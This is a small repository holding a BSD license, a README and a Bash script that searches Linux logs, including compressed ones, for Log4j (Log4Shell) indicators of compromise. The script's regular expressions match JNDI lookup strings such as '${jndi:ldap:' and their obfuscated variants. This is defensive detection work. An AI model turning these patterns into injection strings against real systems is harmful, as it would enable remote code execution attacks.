├── LICENSE
├── README.md
└── log4j_ioc_detector.sh


/LICENSE:
--------------------------------------------------------------------------------
 1 | BSD 3-Clause License
 2 | 
 3 | Copyright (c) 2021, Omar Santos
 4 | All rights reserved.
 5 | 
 6 | Redistribution and use in source and binary forms, with or without
 7 | modification, are permitted provided that the following conditions are met:
 8 | 
 9 | 1. Redistributions of source code must retain the above copyright notice, this
10 |    list of conditions and the following disclaimer.
11 | 
12 | 2. Redistributions in binary form must reproduce the above copyright notice,
13 |    this list of conditions and the following disclaimer in the documentation
14 |    and/or other materials provided with the distribution.
15 | 
16 | 3. Neither the name of the copyright holder nor the names of its
17 |    contributors may be used to endorse or promote products derived from
18 |    this software without specific prior written permission.
19 | 
20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
30 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # log4j Linux IoC Detector
 2 | A basic Bash script to detect log4j Indicator of Compromise (IoC) in Linux.
 3 | 
 4 | ## How to Use
 5 | 1. Clone this repository:
 6 | ```
 7 | git clone https://github.com/santosomar/log4j-ioc-detector
 8 | ```
 9 | 2. Run the the `log4j_ioc_detector.sh` script, as demonstrated below:
10 | 
11 | ```
12 | # bash sudo log4j_ioc_detector.sh
13 | A basic Bash script to detect log4j Indicator of Compromise (IoC) in Linux.
14 | Author: Omar Santos (@santosomar)
15 | +------------------------------------------+
16 | Scan Started:
17 | | Tue Dec 14 17:26:36 UTC 2021             |
18 | Searching for exploitation attempts in uncompressed files in folder /var/log and all sub folders
19 | Searching for  exploitation attempts in compressed files in folder /var/log and all sub folders
20 | Searching for obfuscated variants
21 | ```
22 | 
23 | Any IoCs in the logs will be reported to the screen...
24 | 


--------------------------------------------------------------------------------
/log4j_ioc_detector.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | ############################################################
 3 | # A basic Bash script to detect log4j Indicator of Compromise (IoC) in Linux.
 4 | # Author: Omar Santos (@santosomar)
 5 | # Version: 0.0.1                                              
 6 | ############################################################
 7 | 
 8 | Banner()
 9 | {
10 |     echo "A basic Bash script to detect log4j Indicator of Compromise (IoC) in Linux."
11 |     echo "Author: Omar Santos (@santosomar)"
12 |     echo "+------------------------------------------+"
13 |     echo "Scan Started:"
14 |     printf "| %-40s |\n" "`date`"
15 | 
16 | }
17 | 
18 | Banner
19 | sleep 2
20 | 
21 | echo "Searching for exploitation attempts in uncompressed files in folder /var/log and all sub folders"
22 | sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
23 | 
24 | echo "Searching for  exploitation attempts in compressed files in folder /var/log and all sub folders"
25 | sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+'
26 | 
27 | 
28 | echo "Searching for obfuscated variants"
29 | sudo find /var/log/ -type f -exec sh -c "cat {} | sudo sed -e 's/\${lower://'g | tr -d '}' | sudo egrep -I -i 'jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):'" \;
30 | sudo find /var/log/ -name '*.gz' -type f -exec sh -c "zcat {} | sudo sed -e 's/\${lower://'g | tr -d '}' | sudo egrep -i 'jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):'" \;
31 | 
32 | 


--------------------------------------------------------------------------------